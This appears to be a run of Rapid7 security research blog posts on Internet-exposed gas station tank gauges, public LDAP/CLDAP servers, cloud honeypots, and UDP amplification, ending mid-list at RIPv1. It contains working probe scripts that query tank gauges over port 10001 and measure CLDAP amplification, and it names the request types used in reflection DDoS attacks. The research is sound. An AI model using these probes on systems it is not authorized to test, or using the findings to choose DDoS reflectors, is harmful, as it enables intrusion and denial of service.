As he paused for a breath, the spirit gestured to a woman who had just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had set up, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible. "Do you see what is happening?", asked the spirit. "Where and how people work today are not as fixed as they were in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this or trick users through phishing to get what they desire." "Technology I can secure. But how do I secure people?!", sighed Scrooge. "Did not this woman do what she needed to keep her and your company's data safe?", asked the spirit. "Well, yes. But it's so much more work!", noted Scrooge. "I can't install security on users, I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!"[iii] As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility and the solid capabilities of his existing defenses forced attackers to behave differently, and he understood that he and his team probably needed to as well. The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled "Ignorance & Want" that showcased why it was important to make sure employees were well-informed and to also stay in tune with how users want to work, making sure his company's IT offerings were as easy-to-use and functional as all the shiny "cloud" apps.

The Ghost of Haxmas Future

As Scrooge took hold of the infographic the world around him changed. A dark dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An "eyes" emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future him struggling to keep warm to survive in this horrible wasteland. "Isn't this a bit much?", inquired Scrooge. The spirit shrugged and a "whatever" emoji appeared on the screen. Scrooge continued, "I think I've got the message.
Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology and education as well as technology — to address the new methods attackers will be adopting. If I don't, it's 'game over'." The spirit's screen flashed a "thumbs up" emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand, with his Haxmas spirit fully renewed. He vowed to keep Haxmas all the year through from now on.

[i] Payment Card Industry Data Security Standard Report on Compliance
[ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/
[iii] Scrooge eventually also realized he could make use of modern tools such as Insight IDR to combine security & threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

The Internet of Gas Station Tank Gauges -- Final Take?

In early 2015, HD Moore performed some of the first publicly accessible research related to Internet-connected gas station tank gauges, The Internet of Gas Station Tank Gauges. Later that same year, I did a follow-up study that probed a little deeper in The Internet of Gas Station Tank Gauges — Take #2. As part of that study, we were attempting to see if the exposure of these devices had changed in the ~10 months since our initial study, as well as probe a little bit deeper to see if there were affected devices that we missed in the initial study due to the study's primitive inspection capabilities at the time. Somewhat unsurprisingly, the answer was no, things hadn't really changed, and even with the additional inspection capabilities we didn't see a wild swing that would be any cause for alarm. Recently, we decided to blow the dust off this study and re-run it for old-time's sake, in the event that things had taken a wild swing in either direction or other interesting patterns could be derived. Again, we found very little changed.

Not-ATGs and the Signal to Noise Ratio

What is often overlooked in studies like this is the signal to noise ratio seen in the results, the "signal" being protocol responses you expect to see and the "noise" being responses that are a bit unexpected. For example, finding SSH servers running on HTTP ports, typically TCP-only services being crudely crammed over UDP, and gobs of unknown, intriguing responses that will keep researchers busy chasing down explanations for years. These ATG studies were no exception. In the most recent zmap TCP SYN scan, run against port 10001 on November 3, 2016, we found nearly 3.4 million endpoints responding as open. Of those, we had difficulty sending our ATG-specific probes to over 2.8 million endpoints — some encountered socket-level errors, others simply returned no responses. It is likely that a large portion of these responses, or lack thereof, are due to devices such as tar-pits, IDS/IPS, etc. The majority of the remaining endpoints appear to be a smattering of HTTP, FTP, SSH and other common services run on odd ports for one reason or another. And last but not least are a measly couple of thousand ATGs. I hope to explore the signal-to-noise problems related to internet scanning in a future post.

Future ATG Research and Scan Data

We believe that it is important to be transparent with as much of our research as possible. Even if a particular research path we take ends at a dead, boring end, publishing our process and what we did (or didn't) find might help a future wayward researcher who ends up in this particular neck of research navigate accordingly. With that said, this is likely to be our last post related to ATGs unless new research/ideas arise or interesting swings in results occur in future studies. Is there more to be done here? Absolutely! Possible areas for future research include:

- Are there additional commands that exposed ATGs might support that provide data worth researching, for security or otherwise?
- Are there other services exposed on these ATGs? What are the security implications?
- Are there advancements to be made on the offensive or defensive side relating to ATGs and related technologies?

We have published the raw zmap TCP scan results for all of the ATG studies we've done to date here. We have also started conducting these studies on a monthly basis, and these runs will automatically upload to scans.io when complete.
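For context on what an "ATG-specific probe" looks like, here is a hedged Python sketch of the widely documented in-tank inventory request (the TLS-350 style I20100 function) sent over TCP port 10001. The command byte sequence and the target address are illustrative assumptions drawn from the earlier public research, not the exact probe used in these studies; only run this against devices you own or are authorized to test.

```python
"""Ask an ATG for its in-tank inventory report (TLS-350 style "I20100").

A sketch of the kind of probe these studies describe: connect to TCP port
10001, send the widely documented SOH + I20100 function code, and read the
ASCII report. Only point this at devices you own or are authorized to test;
the host below is a placeholder.
"""
import socket

def inventory_report(host, port=10001, timeout=10):
    probe = b"\x01I20100\n"          # SOH + function code for in-tank inventory
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(probe)
        s.settimeout(timeout)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass                      # device stopped sending; report is likely complete
    return b"".join(chunks).decode("ascii", errors="replace")

if __name__ == "__main__":
    print(inventory_report("192.0.2.10"))  # placeholder address
```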
As usual, thanks for reading, and we welcome your feedback, comments, criticisms, ideas or collaboration requests here as a comment or by reaching out to us at research@rapid7.com. Enjoy!

Project Sonar Study of LDAP on the Internet

The topic of today's post is a Rapid7 Project Sonar study of publicly accessible LDAP services on the Internet. This research effort was started in July of this year and various portions of it continue today. In light of the Shadowserver Foundation's recent announcement regarding the availability of relevant reports, we thought it would be a good time to make some of our results public.

The study was originally intended to be an Internet scan for Connectionless LDAP (CLDAP), which was thought to only be used by Microsoft Active Directory. This protocol uses LDAP over UDP instead of the typical TCP. CLDAP was proposed in RFC 1798 in June of 1995, but its standard was marked as abandoned per RFC 3352 in March of 2003 due to lack of support and implementation. Microsoft uses CLDAP as part of the client's discovery mechanism via LDAP Ping (additional reference). In the early phases of the study it was determined that the toolset could be used to survey LDAP over TCP, and so the scope was expanded. In this document the term LDAP will be used interchangeably for both LDAP (TCP) and CLDAP (UDP).

The intent of the study was to attempt to answer multiple questions:

- How prevalent is publicly accessible LDAP on the Internet? The term "publicly accessible" in this case means services that allow connections from and communications with our various scanners. In no case did we test with any form of authentication other than an anonymous LDAP bind.
- Can we identify the remote service and, if so, determine whether Microsoft Active Directory is the only product using the CLDAP protocol?
- Would CLDAP be an effective service in DRDoS attacks?

Study implementation

Like most other UDP services, CLDAP will only respond to correctly formatted probes. In our study we performed service discovery using zmap with a probe file containing a rootDSE request. This request, defined in RFC 4512 Section 5.1, is part of the LDAP protocol standard and is essentially a request for information about the server and its capabilities. The rootDSE request was chosen as the functionality should be present on all LDAP servers and, importantly, it does not require authentication by RFC definition. This reduces the legal risk of the study, as no authentication mechanisms needed to be bypassed. During the study it was found that most of the LDAP responses were larger than a single packet and were fragmented in order to traverse the Internet. Fragment reassembly functionality is not part of the zmap use case at this time, so we followed the scan with another scan against open services using a custom tool that performs a more comprehensive capture of the response.

Since the protocol for communicating with Microsoft's LDAP on UDP is pretty much per the RFC standard, it would make sense that any tooling that works with LDAP over UDP should also work with LDAP over TCP with minor changes. This turned out to be the case, and the study was expanded to the following ports and services:

Port/Proto   Description
389/tcp      Standard LDAP port; depending on product/config it may support STARTTLS
636/tcp      LDAP over TLS
3268/tcp     Microsoft Active Directory Global Catalog; may support STARTTLS
3269/tcp     Microsoft Active Directory Global Catalog over TLS
389/udp      Connectionless LDAP (CLDAP) implementation for Active Directory

We've performed multiple Internet-wide scans on these ports as part of the study. Where possible we negotiated TLS or STARTTLS. The results published in this post are based on Internet-wide IPv4 scans performed September 14th and 15th of this year.
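To make the methodology concrete, here is a rough Python sketch of a CLDAP rootDSE probe over UDP 389, along with a simple amplification measurement of the kind discussed later in this post. The BER bytes are my own minimal encoding of an anonymous rootDSE search, not the exact probe Sonar used, and the target address is a placeholder; only probe hosts you are authorized to test.

```python
"""Send a minimal CLDAP rootDSE search over UDP 389 and measure amplification.

A sketch only: the BER bytes below are a hand-rolled encoding of an
anonymous, baseObject-scope search for the rootDSE with an empty attribute
list; they are not the exact probe used in the study (which was roughly 51
bytes). Only probe hosts you are authorized to test.
"""
import socket

# LDAPMessage { messageID 1, SearchRequest { base "", scope baseObject,
# derefAliases never, sizeLimit 0, timeLimit 0, typesOnly FALSE,
# filter (objectClass=*), attributes {} } }
ROOTDSE_PROBE = bytes.fromhex(
    "3025020101632004000a01000a0100020100020100010100870b6f626a656374436c6173733000"
)

def probe(host, port=389, timeout=5):
    """Return the total number of response bytes received from the target."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    total = 0
    try:
        sock.sendto(ROOTDSE_PROBE, (host, port))
        while True:
            data, _ = sock.recvfrom(65535)
            total += len(data)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return total

if __name__ == "__main__":
    resp_bytes = probe("192.0.2.45")  # placeholder target
    if resp_bytes:
        print(f"sent {len(ROOTDSE_PROBE)} bytes, received {resp_bytes} bytes "
              f"(~{resp_bytes / len(ROOTDSE_PROBE):.0f}x amplification)")
    else:
        print("no response")
```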
Study results

Prevalence

The answer to the study's first question is that there are a significant number of publicly accessible LDAP servers on the Internet.

Port       Responses   Decoded as LDAP   Percent
389/tcp    300,663     264,536           88.0%
636/tcp    91,842      72,230            78.6%
3268/tcp   113,207     96,270            85.0%
3269/tcp   30,199      29,668            98.2%
389/udp    79,667      78,908            99.0%

The percentage of LDAP servers is actually slightly higher than reported. Some of the service responses that did not decode as LDAP were visually identified as fragments of legitimate LDAP responses.

Service identification

A significant number of services returned information that allowed us to successfully fingerprint them. This fingerprinting capability was added to the Rapid7 Recog tool, which is discussed later in this post. In our data set we found that most of the LDAP services were Microsoft Active Directory Controllers (ADC) or Lightweight Directory Services (LDS) (formerly Active Directory Application Mode). Here is the breakdown of ADC and LDS services in the data set. The Samba ADC implementation has been included as well.

Port       Total LDAP   MS ADC    %      MS LDS   %     Samba AD   %
389/tcp    264,536      117,875   44.6%  4,209    1.6%  1,276      0.5%
636/tcp    72,230       37,848    52.4%  214      0.3%  1,222      1.7%
3268/tcp   96,270       95,057    98.7%  0        0.0%  1,169      1.2%
3269/tcp   29,668       28,470    96.0%  0        0.0%  1,159      3.9%
389/udp    78,908       76,356    96.8%  1,223    1.5%  1,283      1.6%

It turns out that it is possible to not only identify the software in most cases, but we can usually identify the host operating system as well. In the case of Microsoft ADC and LDS services, there is almost always enough information to determine the more specific operating system version, such as Windows Server 2012 R2. Most of the ADC and LDS services in the data set are running supported versions of the OS. Some are ahead of the curve, some are behind. As a note, Microsoft ended all support for all versions of Windows Server 2003 as of July 14, 2015.

Product                      389/tcp   %      389/udp   %
Total AD and LDS             122,084          77,579
MS Windows Server 2008 R2    48,050    39.4%  21,309    27.5%
MS Windows Server 2012 R2    35,159    28.8%  28,354    36.6%
MS Windows Server 2003       15,476    12.7%  12,342    15.9%
MS Windows Server 2008       12,307    10.1%  5,750     7.4%
MS Windows Server 2012       10,868    8.9%   8,862     11.4%
MS Windows Server 2016       224       0.2%   195       0.3%
MS Windows Server 2000       0         0.0%   767       1.0%

We can also identify other products, just in smaller numbers. The table below contains a few examples selected from a much longer list.

Count    Product                                                          Port
52,429   OpenLDAP OpenLDAP                                                389/tcp
13,962   OpenLDAP OpenLDAP                                                636/tcp
9,536    Kerio Connect                                                    636/tcp
2,149    VMware Platform Services Controller 6.0.00                       389/tcp
2,118    VMware Platform Services Controller 6.0.00                       636/tcp
517      IBM Security Directory Server 6.3                                389/tcp
435      Fedora Project Fedora Directory Server 1.0.4 B2007.304.11380     389/tcp
397      IBM Security Directory Server 6.1                                389/tcp
248      innovaphone IPVA                                                 636/tcp
154      Sun Microsystems Sun Java System Directory Server 5.2_Patch_6    389/tcp
148      IBM Domino LDAP Server 8.5.30                                    389/tcp

This allows us to answer the study's second question, regarding the ability to identify services. We can successfully do this in many cases, though there is a non-trivial number of generic LDAP responses returned on 389/tcp. We've also determined that Microsoft ADC and LDS aren't the only services using CLDAP, as we found six instances of Novell LDAP Agent for eDirectory in the data set.
DRDoS utility

The specific type of DDoS we are interested in was described by Rapid7 Labs researcher Jon Hart in a recent Rapid7 Community blog post:

A distributed, reflected denial of service (DRDoS) attack is a specialized variant of the DDoS attack that typically exploits UDP amplification vulnerabilities. These are often referred to as volumetric DDoS attacks, a more generic type of DDoS attack that specifically attempts to consume precious network resources. A UDP amplification vulnerability occurs when a UDP service responds with more data or packets than the initial request that elicited the response(s). Combined with IP packet spoofing/forgery, attackers send a large number of spoofed UDP datagrams to UDP endpoints known to be susceptible to UDP amplification, using a source address corresponding to the IP address of the ultimate target of the DoS. In this sense, the forged packets cause the UDP service to "reflect" back at the DoS target.

Based on service responses to probes on 389/udp, it would appear CLDAP does provide a significant amplification source. The UDP datagram probe that was used in the study was roughly 51 bytes. Most of the valid LDAP responses without the headers ranged from 1,700 to 3,500 bytes. There were a few outliers in the 5,000 to 17,700 range. The chart below shows the response size distribution with the larger outliers removed. The services returning 3,000 bytes of response data are providing a 58x bandwidth amplification factor. We didn't track the number of packets returned, but using almost any reasonable MTU value will result in a packet amplification factor of 2x or 3x. Based on this finding, CLDAP is effective as a DRDoS amplification source. Its utility as such will primarily be limited by how prevalent public access to the service remains over time.

Study success

When the study completed, we were able to answer the study's primary questions. LDAP is fairly prevalent on the public Internet. We can identify the software providing most of the LDAP services. We were able to determine that Microsoft ADC and LDS weren't the only software providing CLDAP services, though the Internet presence of others was statistically insignificant. We were also able to determine that CLDAP could be used in DRDoS attacks if significant numbers of services remain available on the public Internet.

Community contributions

Rapid7 is a strong supporter of open source. In addition to well known projects like Metasploit, we also open source some of our tools and utilities. Two such tools were used in this study and have been enhanced as a result of it.

Recog

The initial scans provided us with a corpus of responses that we could use for generating product fingerprints. Reviewing the responses proved to be time consuming but very fruitful. The result was that Rapid7's open source fingerprinting tool Recog was updated to support LDAP fingerprints, and an initial 55 fingerprints were added. Part of the update also included adding support to Recog for building fingerprints and examples with binary strings. This means that server responses can be handed directly to Recog without being processed or stripped, if the fingerprint was constructed to support it. This functionality is available in the public Recog GitHub repo and gems as of version 2.0.22, which was released on August 25, 2016.

DAP

As part of our study process we often run the scan results through Rapid7's open source Data Analysis Pipeline (DAP) tool for data enrichment.
This generally includes adding geoIP tagging and protocol decoding if appropriate. DAP can also leverage Recog's version detection for determining the remote service's product, version, and/or operating system. Part of this study included adding support for decoding LDAP protocol responses to DAP. It will now decode a properly formatted LDAP response into a nested JSON structure. This functionality is available in the public DAP GitHub repo and gems as of version 0.0.10, which was released on August 2, 2016.

Example

In the example below, DAP is handed JSON-formatted data that contains an IP, a base64-encoded server response, the port, and the protocol. It returns additional data including version detection (data.recog.*), the decoded LDAP response (data.SearchResultEntry, data.SearchResultDone), and geoIP information (ip.country*, ip.latitude, ip.longitude). At the end, the jq utility is used to improve the readability of the result.

Command

echo '{"ip": "66.209.xxx.xxx", "data": "MDACAQdkKwQAMCcwJQQLb2JqZWN0Q2xhc3MxFgQDdG9wBA9PcGVuTERBUHJvb3REU0UwDAIBB2UHCgEABAAEAA==", "port": 389, "proto": "tcp"}' | \
  bin/dap json + \
  transform data=base64decode + annotate data=length + \
  recog data=ldap.search_result + \
  decode_ldap_search_result data + \
  remove data + geo_ip ip + \
  geo_ip_org ip + json | jq

Result

{
  "ip": "66.209.xxx.xxx",
  "port": 389,
  "proto": "tcp",
  "data.length": 64,
  "data.recog.matched": "OpenLDAP",
  "data.recog.service.vendor": "OpenLDAP",
  "data.recog.service.product": "OpenLDAP",
  "data.SearchResultEntry": {
    "objectName": "",
    "PartialAttributes": {
      "objectClass": [
        "top",
        "OpenLDAProotDSE"
      ]
    }
  },
  "data.SearchResultDone": {
    "resultCode": 0,
    "resultDesc": "success",
    "resultMatchedDN": "",
    "resultdiagMessage": ""
  },
  "ip.country_code": "US",
  "ip.country_code3": "USA",
  "ip.country_name": "United States",
  "ip.latitude": "36.xx",
  "ip.longitude": "-115.xxxxxxxxx"
}

This is one of the simpler examples. The responses from Active Directory Controllers contain significantly more information.

Final thoughts

The results from the study were able to successfully answer the original questions but prompted new ones. Fortunately, there is quite a bit of information that remains to be extracted from the data that we have. It is likely that there will be multiple future blog posts on the data, the software and versions identified in it, and information about the individual hosts that can be extracted from it. Unlike other studies that Project Sonar publishes on Scans.IO, we have not yet made these data sets available. For those of you who are concerned that your network may be exposing LDAP services, I recommend the following (a small self-scan sketch follows this list):

- If your organization is a service provider or a company with assigned ASNs, you can sign up for free Shadowserver reports. The Shadowserver Foundation scans the Internet for certain services of concern, such as those that could be used in DDoS, and will provide regular reports on these to network owners. Last week they announced support for discovering and reporting on CLDAP.
- Use an external service, such as the Rapid7 Perimeter Scanning Service, or an externally hosted scan engine to perform scans of your Internet-accessible IP space. Ensure that the ports listed above are included in the scan template. This will provide a more accurate picture of what your organization is exposing to the Internet than that provided by an internally hosted scanner.
- Review firewall rules to determine if any are overly permissive.
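To complement those recommendations, here is a small, hedged Python sketch that checks your own ranges for listeners on the LDAP-related TCP ports from the table above. The CIDR is a placeholder, and 389/udp would need an actual CLDAP probe such as the rootDSE sketch earlier in this post.

```python
"""Quick TCP connect check of the LDAP-related ports across your own ranges.

A small self-assessment sketch: it simply attempts TCP connections to 389,
636, 3268, and 3269 on each address in a CIDR you own (the range below is a
placeholder). Run it from outside your perimeter for a realistic view, and
only against networks you are authorized to scan.
"""
import ipaddress
import socket

LDAP_TCP_PORTS = (389, 636, 3268, 3269)

def exposed_ldap(cidr="198.51.100.0/28", timeout=2):
    for host in ipaddress.ip_network(cidr).hosts():
        for port in LDAP_TCP_PORTS:
            try:
                with socket.create_connection((str(host), port), timeout=timeout):
                    yield str(host), port
            except OSError:
                continue  # closed, filtered, or timed out

if __name__ == "__main__":
    for host, port in exposed_ldap():
        print(f"{host}:{port}/tcp accepts connections")
```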
As always, if you are interested in having Sonar perform additional relevant studies, have an interest in related research, or if you have questions, we welcome your comments here as well as by reaching out to us at research@rapid7.com.

[Cloud Security Research] Cross-Cloud Adversary Analytics

Introducing Project Heisenberg Cloud
Project Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg…

Introducing Project Heisenberg Cloud
Project Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg along with internet reconnaissance data from Rapid7's Project Sonar.
Internet-scale reconnaissance with cloud-inspired automation
Heisenberg honeypots are a modern take on the seminal attacker detection tool. Each Heisenberg node is a lightweight, highly configurable agent that is centrally deployed using well-tested tools, such as terraform, and controlled from a central administration portal. Virtually any honeypot code can be deployed to Heisenberg agents and all agents send back full packet captures for post-interaction analysis. One of the main goals of Heisenberg is to understand attacker methodology. All interaction and packet capture data is synchronized to a central collector and all real-time logs are fed directly into Rapid7's Logentries for live monitoring and historical data mining.
Insights into cloud configs and attacker methodology
Rapid7 and Microsoft deployed multiple Heisenberg honeypots in every "zone" of six major cloud providers: Amazon, Azure, Digital Ocean, Rackspace, Google and Softlayer, and examined the service diversity in each of these environments and the types of connections attackers, researchers and organizations are initiating within, against and across these environments. To paint a picture of the services offered in each cloud provider, the research teams used Sonar data collected during Rapid7's 2016 National Exposure study. Some highlights include:
The six cloud providers in our study make up nearly 15% of available IPv4 addresses on the internet.
22% of Softlayer nodes expose database services (MySQL & SQL Server) directly to the internet.
Web services are prolific, with 53-80% of nodes in each provider exposing some type of web service.
Digital Ocean and Google nodes expose shell (Telnet & SSH) services at a much higher rate - 86% and 74%, respectively - than the other four cloud providers in this study.
A wide range of attacks were detected, including ShellShock, SQL injection, PHP webshell injection and credential attacks against SSH, Telnet and remote framebuffer (e.g. VNC, RDP & Citrix).
Our honeypots caught "data mashup" businesses attempting to use the cloud to mask illegal content scraping activity.
Read More
For more detail on our initial findings with Heisenberg Cloud, please click here to download our report or here for slides from our recent UNITED conference presentation.
Acknowledgements
We would like to thank Microsoft and Amazon for engaging with us through the initial stages of this research effort, and, as indicated above, we hope they, and other cloud hosting providers, will continue to do so as we move forward with the project.

NCSAM: Understanding UDP Amplification Vulnerabilities Through Rapid7 Research

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial…

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial security research. Throughout the month, we will be sharing content that enhances understanding of what independent security research is, how it benefits the digital ecosystem, and the challenges that researchers face. When we began brainstorming ideas for NCSAM, I suggested something related to distributed denial of service (DDoS) attacks, specifically with a focus on the UDP amplification vulnerabilities that are typically abused as part of these attacks.  Rarely a day goes by lately in the infosec world where you don't hear about DDoS attacks crushing the Internet presence of various companies for a few hours, days, weeks, or more.  Even as I wrote this, DDoS attacks are on the front page of many major news outlets. A variety of services that I needed to write this very blog post were down because of DDoS, and I even heard DDoS discussed on the only radio station I am able to get where I live. Timely. What follows is a brief primer on and a look at what resources Rapid7 provides for further understanding UDP amplification attacks. Background A denial of service (DoS) vulnerability is about as simple as it sounds -- this vulnerability exists when it is possible to deny, prevent or in some way hinder access to a particular type of service.  Abusing a DoS vulnerability usually involves an attack that consumes precious compute or network resources such as CPU, memory, disk, and network bandwidth. A DDoS attack is just a DoS attack on a larger scale, often using the resources of compromised devices on the Internet or other unwitting systems to participate in the attack. A distributed, reflected denial of service (DRDoS) attack is a specialized variant of the DDoS attack that typically exploits UDP amplification vulnerabilities.  These are often referred to as volumetric DDoS attacks, a more generic type of DDoS attack that specifically attempts to consume precious network resources. A UDP amplification vulnerability occurs when a UDP service responds with more data or packets than the initial request that elicited the response(s). Combined with IP packet spoofing/forgery, attackers send a large number of spoofed UDP datagrams to UDP endpoints known to be susceptible to UDP amplification using a source address corresponding to the IP address of the ultimate target of the DoS.  In this sense, the forged packets cause the UDP service to "reflect" back at the DoS target. The exact impact of the attack is a function of how many systems participate in the attack and their available network resources, the network resources available to the target, as well as the bandwidth and packet amplification factors of the UDP service in question. A UDP service that returns 100 bytes of UDP payload in response to a 1-byte request is said to have a 100x bandwidth amplification factor.  A UDP service that returns 5 UDP packets in response to 1 request is said to have a 5x packet amplification factor. Oftentimes a ratio is used in place of a factor. For example, a 5x amplification factor can also be said to have a 1:5 amplification ratio. 
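To make those two definitions concrete, here is a tiny Python sketch (the request and response sizes are made-up illustration values, not measurements from Sonar):

```python
def bandwidth_amplification(request_bytes: int, response_bytes: int) -> float:
    """Bytes returned per byte sent: 1 byte in, 100 bytes out -> 100x (a 1:100 ratio)."""
    return response_bytes / request_bytes

def packet_amplification(request_packets: int, response_packets: int) -> float:
    """Packets returned per packet sent: 1 packet in, 5 packets out -> 5x (a 1:5 ratio)."""
    return response_packets / request_packets

# Hypothetical reflector: one 1-byte probe elicits five datagrams totalling 100 bytes.
print(bandwidth_amplification(1, 100))  # 100.0
print(packet_amplification(1, 5))       # 5.0
```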
For more information, consider the following resources: US-CERT's alert on UDP-Based Amplification Attacks The Spoofer project from the Center for Applied Internet Data Analysis (CAIDA) Sonar UDP Studies Rapid7's Project Sonar has been performing a variety of UDP scans on a monthly basis and uploading the results to scans.io for consumption by the larger infosec/network community for nearly three years. Infosec practitioners can use this raw scan data to research a variety of aspects related to UDP amplification vulnerabilities, including geographic/sector specific patterns, amplification factors, etc.  There are, however, some caveats: Although we do not currently have studies for all UDP services with amplification vulnerabilities, we have a fair number and are in the process of adding more. Not all of these studies specifically cover the UDP amplification vulnerabilities for the given service.  Some happen to use other probe types more likely to elicit a response.  In these cases, the existence of a response for a given IP simply means that it responded to our probe for that service, is likely running that service in question, but doesn't necessarily imply that the IP in question is harboring a UDP amplification vulnerability. Our current usage of zmap is such that we will only record the first UDP packet seen in response to our probe.  So, if a UDP service happens to suffer from a packet-based UDP amplification vulnerability, the Sonar data alone may not show the true extent. Currently, Rapid7's Project Sonar has coverage for a variety of  UDP services that happen to be susceptible to UDP amplification attacks. Dennis Rand, a security researcher from Denmark, recently reached out to us asking for us to provide regular studies of the qotd (17/UDP), chargen (19/UDP) and RIPv1 services (520/UDP). When discussing his use cases for these and the other existing Sonar studies, Dennis had the following to add: "I've been using the dataset from Rapid7 UDP Sonar for various research projects as a baseline and core part of the dataset in my research has been amazing. This data could be used by any ISPs out there to detect if they are potentially being part of the problem.  A simple task could be to setup a script that would pull the lists every month and the compare it against previous months, if at some point the numbers go way up, this could be an indication that you might have opened up for something you should not, or at least be aware of this fact in you internal risk assessment. Also it is awesome to work with people who are first of doing this for free, at least seen from my perspective, but still being so open to helping out in the research, like adding new service to the dataset help me to span even wider in my research projects." For each of the studies described below, the data provided on scans.io is gzip-compressed CSV with a header indicating the respective field values, which are, for every host that responded, the timestamp in seconds since the UNIX epoch, the source address and port of the response, the destination address and port (where Sonar does its scanning from), the IP ID, the TTL, and the hex-encoded UDP response payload, if any.  Precisely how to decode the data for each of the studies listed below is an exercise currently left for the reader that may be addressed in future documentation, but for now the descriptions below in combination with Rapid7's dap should be sufficient. 
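As a starting point, here is a small Python sketch that walks one of those gzip-compressed CSV files and hex-decodes the payload column. The column order below is taken from the description above; check it against the header row of the file you download, since the exact header names are not reproduced here and the filename is hypothetical:

```python
import csv
import gzip
import sys

# Path to a Sonar UDP study download from scans.io (this filename is hypothetical).
path = sys.argv[1] if len(sys.argv) > 1 else "20161003-netbios-137.csv.gz"

with gzip.open(path, mode="rt", newline="") as fh:
    reader = csv.reader(fh)
    header = next(reader)
    print("columns:", header)

    for row in reader:
        # Order per the description above: timestamp, source address/port,
        # destination address/port, IP ID, TTL, hex-encoded UDP payload.
        ts, saddr, sport, daddr, dport, ipid, ttl, payload_hex = row
        payload = bytes.fromhex(payload_hex) if payload_hex else b""
        print(f"{saddr}:{sport} answered with {len(payload)} bytes of UDP payload")
        break  # just the first record, for illustration
```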
DNS (53/UDP)
This study sends a DNS query to 53/UDP for the VERSION.BIND text record in the CHAOS class. In some situations this will return the version of ISC BIND that the DNS server is running, and in others it will just return an error. Data can be found here in files with the -dns-53.csv.gz suffix. In the most recent run of this study on 10/03/2016, there were 7,963,280 endpoints that responded.
NTP (123/UDP)
There are two variants of this study. The first sends an NTP version 2 MON_GETLIST_1 request, which will return a list of all recently connected NTP peers, generally up to 6 per packet with additional peers sent in subsequent UDP responses. Responses for this study can be found here in files with the ntpmonlist-123.csv.gz suffix. The probe used in this study is the same as one frequently used in UDP amplification attacks against NTP. In the most recent run of this study on 10/03/2016, 1,194,146 endpoints responded. The second variant of this study sends an NTP version 2 READVAR request and will return all of the internal variables known to the NTP process, which typically includes things like software version, information about the underlying OS or hardware, and data specific to NTP's timekeeping. The responses can be found here in files with the ntpreadvar-123.csv.gz suffix. In the most recent run of this study on 10/03/2016, 2,245,681 endpoints responded. Other UDP amplification attacks in NTP that continue to enable DDoS attacks are described in R7-2014-12.
NBNS (137/UDP)
This study has been described in greater detail here, but the summary is that this study sends an NBNS name request. Most endpoints speaking NBNS will return a wealth of metadata about the node/service in question, including system and group/domain names and MAC addresses. This is the same probe that is frequently used in UDP amplification attacks against NBNS. The responses can be found here in files with the -netbios-137.csv.gz suffix. In the most recent run of this study on 10/03/2016, 1,768,634 endpoints responded.
SSDP/UPnP (1900/UDP)
This study sends an SSDP request that will discover the rootdevice service of most UPnP/SSDP-enabled endpoints. The responses can be found here in files with the -upnp-1900.csv.gz suffix. UDP amplification attacks against SSDP/UPnP often involve a similar request but for all services, often resulting in a 10x packet amplification and a 40x bandwidth amplification. In the most recent run of this study on 10/03/2016, 4,842,639 endpoints responded.
Portmap (111/UDP)
This study sends an RPC DUMP request to version 2 of the portmap service. Most endpoints exposing 111/UDP that are the portmap RPC service will return a list of all of the RPC services available on this node. The responses can be found here in files with the -portmap-111.csv.gz suffix. There are numerous ways to exploit UDP amplification vulnerabilities in portmap, including the same one used in the Sonar study, a portmap version 3 variant that is often more voluminous, and a portmap version 4 GETSTAT request. In the most recent run of this study on 10/03/2016, 2,836,710 endpoints responded.
Quote of the Day (17/UDP)
The qotd service is essentially the UNIX fortune program bound to a UDP socket, returning quotes/adages in response to any incoming 17/UDP datagram. Sonar's version of this study sends an empty UDP datagram to the port and records any responses, which is believed to be similar to the variant used in the UDP amplification attacks.
The responses can be found here in files with the -qotd-17.csv.gz suffix. In the most recent run of this newly added study on 10/21/2016, a mere 2,949 endpoints responded.
Character Generator (19/UDP)
The chargen service dates from a time when the Internet was a wholly different place. The UDP variant of chargen will send a random number of bytes in response to any datagram arriving on 19/UDP. While most implementations stick to purely ASCII strings of random lengths between 0 and 512, some are much chattier, spewing MTU-filling gibberish, packet after packet. The responses can be found here in files with the -chargen-19.csv.gz suffix. In the most recent run of this newly added study on 10/21/2016, only 3,791 endpoints responded.
RIPv1 (520/UDP)
